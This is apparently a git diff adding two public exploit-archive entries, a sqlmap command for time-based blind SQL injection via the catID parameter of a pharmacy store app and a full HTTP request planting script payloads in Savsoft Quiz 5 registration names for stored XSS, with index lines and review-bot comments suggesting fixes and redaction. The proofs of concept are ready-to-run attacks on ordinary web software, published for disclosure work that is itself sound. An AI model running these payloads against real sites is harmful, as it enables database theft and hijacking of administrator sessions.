diff --git a/exploits/php/webapps/48752.txt b/exploits/php/webapps/48752.txt
new file mode 100644
index 000000000..9bc127fbe
--- /dev/null
+++ b/exploits/php/webapps/48752.txt
@@ -0,0 +1,13 @@
+# Title: Pharmacy Medical Store and Sale Point 1.0 - 'catid' SQL Injection
+# Exploit Author: Moaaz Taha (0xStorm)
+# Date: 2020-08-18
+# Vendor Homepage: https://www.sourcecodester.com/php/14398/pharmacymedical-store-sale-point-using-phpmysql-bootstrap-framework.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14398&title=Pharmacy%2FMedical+Store+%26+Sale+Point+Using+PHP%2FMySQL+with+Bootstrap+Framework
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4
+
+# Description
+This parameter "catId" is vulnerable to Time-Based blind SQL injection in this path "/medical/inventeries.php?catID=1" that leads to retrieve all databases.
+
+#POC
+sqlmap -u "http://TARGET/medical/inventeries.php?catID=1" -p catId --dbms=mysql --threads=10
\ No newline at end of file
diff --git a/exploits/php/webapps/48753.txt b/exploits/php/webapps/48753.txt
new file mode 100644
index 000000000..1e38f29b4
--- /dev/null
+++ b/exploits/php/webapps/48753.txt
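Review bot: The injectable parameter is spelled three ways in 48752.txt: `'catid'` in the title, `"catId"` in the description and in `-p catId`, but `catID` in the path and the URL. PHP request keys are case-sensitive, so the entry should use the single spelling that `inventeries.php` actually reads (presumably `catID`, as in the URL); this also matters to anyone writing a detection rule or locating the query from this text. The description gives no fix, and a line such as `# Mitigation: bind catID as a prepared-statement parameter, or cast it to an integer, before it reaches the query` would help defenders; the vulnerable query is not shown here, so that wording needs confirming against the source. `x64_86` in the Tested On line is probably meant to be `x86_64`.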
@@ -0,0 +1,40 @@
+# Exploit Title: Savsoft Quiz 5 - Stored Cross-Site Scripting
+# Date: 2020-07-28
+# Exploit Author: Mayur Parmar(th3cyb3rc0p)
+# Vendor Homepage: https://savsoftquiz.com/
+# Software Link: https://github.com/savsofts/savsoftquiz_v5.git
+# Version: 5.0
+# Tested on: Windows 10
+# Contact: https://www.linkedin.com/in/th3cyb3rc0p/
+
+Stored Cross-site scripting(XSS):
+Stored attacks are those where the injected script is permanently stored on the target servers,
+such as in a database, in a message forum, visitor log, comment field, etc.
+The victim then retrieves the malicious script from the server when it requests the stored information.
+Stored XSS is also sometimes referred to as Persistent XSS.
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in User Registration section and each time admin visits the manage user section from admin panel,
+the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: First Name, Last Name
+Steps for reproduce:
+1. Goto registration page
+2. fill the details. & put payload in First name,Last name
+3. Now goto Admin Panel.we can see that our payload gets executed.
+
+POST /index.php/login/insert_user/ HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 255
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/index.php/login/registration/
+Cookie: ci_session=d99b121b1213b92a163181fd49c75f667dbce9ea
+Upgrade-Insecure-Requests: 1
+
+email=hack3r%40gmail.com&password=Hacker%40gmail.com&first_name=%3Cscript%3Ealert%28%22XSS+0%22%29%3B%3C%2Fscript%3E&last_name=%3Cscript%3Ealert%28%22XSS+2%22%29%3B%3C%2Fscript%3E&contact_no=9876543210&gid%5B%5D=1
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 042716513..efe4bebaf 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42993,3 +42993,5 @@ id,file,description,date,author,type,platform,port
 48749,exploits/hardware/webapps/48749.txt,"QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion",2020-08-17,LiquidWorm,webapps,hardware,
 48750,exploits/hardware/webapps/48750.txt,"QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure",2020-08-17,LiquidWorm,webapps,hardware,
 48751,exploits/hardware/webapps/48751.txt,"QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)",2020-08-17,LiquidWorm,webapps,hardware,
+48752,exploits/php/webapps/48752.txt,"Pharmacy Medical Store and Sale Point 1.0 - 'catid' SQL Injection",2020-08-18,"Moaaz Taha",webapps,php,
+48753,exploits/php/webapps/48753.txt,"Savsoft Quiz 5 - Stored Cross-Site Scripting",2020-08-18,"Mayur Parmar",webapps,php,
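Review bot: The captured request in 48753.txt is published with what looks like a real session value in the `Cookie: ci_session=` header and with account credentials in the body. Even for a localhost capture these are better replaced with labelled placeholders such as `ci_session=<session-id>`. The write-up says the payload runs when the admin opens the manage-user view but gives no fix; a line such as `# Mitigation: HTML-encode first_name and last_name wherever the admin user list renders them` would make the entry usable by defenders. Since the stated impact is cookie theft, it would also help to note whether `ci_session` is issued with the HttpOnly flag. Neither the rendering code nor the cookie attributes are visible in this diff, so both points need confirming against the application.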